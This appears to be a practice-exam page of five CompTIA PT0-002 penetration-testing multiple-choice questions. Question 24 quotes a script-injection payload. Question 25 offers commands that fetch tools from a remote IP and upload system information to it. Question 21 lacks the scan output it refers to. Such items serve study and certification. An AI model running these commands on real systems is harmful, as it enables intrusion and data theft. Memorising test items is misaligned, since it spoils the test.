Online Access Free CompTIA.PT0-002.v2024-08-03.q205 Practice Test (Page 6)

PT0-002 Exam Question 21

A penetration tester conducted a vulnerability scan against a client's critical servers and found the following:

Which of the following would be a recommendation for remediation?

A.Utilize the secure software development life cycle

B.Deploy a user training program

C.Implement a patch management plan

D.Configure access controls on each of the servers

PT0-002 Exam Question 22

A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

A.As backup in case the original documents are lost

B.To guide them through the building entrances

C.To validate the billing information with the client

D.As proof in case they are discovered

PT0-002 Exam Question 23

A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service. Which of the following methods would BEST support validation of the possible findings?

A.Utilize an nmap -sV scan against the service

B.Review SIP traffic from an on-path position to look for indicators of compromise

C.Manually check the version number of the VoIP service against the CVE release

D.Test with proof-of-concept code from an exploit database

PT0-002 Exam Question 24

A company developed a new web application to allow its customers to submit loan applications. A penetration tester is reviewing the application and discovers that the application was developed in ASP and used MSSQL for its back-end database. Using the application's search form, the penetration tester inputs the following code in the search input field:
IMG SRC=vbscript:msgbox ("Vulnerable_to_Attack") ; >originalAttribute="SRC"originalPath="vbscript;msgbox ("Vulnerable_to_Attack ") ;>" When the tester checks the submit button on the search form, the web browser returns a pop-up windows that displays "Vulnerable_to_Attack." Which of the following vulnerabilities did the tester discover in the web application?

A.Cross-site scripting

B.Command injection

C.SQL injection

D.Cross-site request forgery

PT0-002 Exam Question 25

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions.
Which of the following commands would help the tester START this process?

A.certutil -urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe

B.powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/ upload.php', 'systeminfo.txt')

C.schtasks /query /fo LIST /v | find /I "Next Run Time:"

D.wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe

Other Version: 1267CompTIA.PT0-002.v2024-10-18.q187; 877CompTIA.PT0-002.v2024-10-14.q167; 1281CompTIA.PT0-002.v2023-12-04.q144; 1311CompTIA.PT0-002.v2023-05-17.q120; 1631CompTIA.PT0-002.v2023-03-06.q121; 1021CompTIA.PT0-002.v2023-02-18.q78; 1679CompTIA.PT0-002.v2022-10-11.q87; 1697CompTIA.PT0-002.v2022-05-11.q49; 2150CompTIA.PT0-002.v2022-04-23.q64; 38CompTIA.Actualtestpdf.PT0-002.v2022-03-19.by.marcus.64q.pdf; 2041CompTIA.PT0-002.v2021-11-22.q40; 77CompTIA.Prep4king.PT0-002.v2021-08-07.by.beulah.35q.pdf

Latest Upload: 135Oracle.1D0-1057-25-D.v2026-06-03.q29; 268NAHQ.CPHQ.v2026-06-03.q396; 252CompTIA.220-1201.v2026-06-03.q196; 152GIAC.GCFE.v2026-06-03.q78; 145HIMSS.CPHIMS.v2026-06-03.q45; 229Google.Professional-Cloud-Architect.v2026-06-03.q165; 143HP.HPE7-A09.v2026-06-02.q48; 152ACDIS.CCDS-O.v2026-06-02.q56; 132Microsoft.AB-730.v2026-06-02.q31; 208ASQ.CSSBB.v2026-06-02.q130

PT0-002 Exam Question 21

PT0-002 Exam Question 22

PT0-002 Exam Question 23

PT0-002 Exam Question 24

PT0-002 Exam Question 25

Download PDF File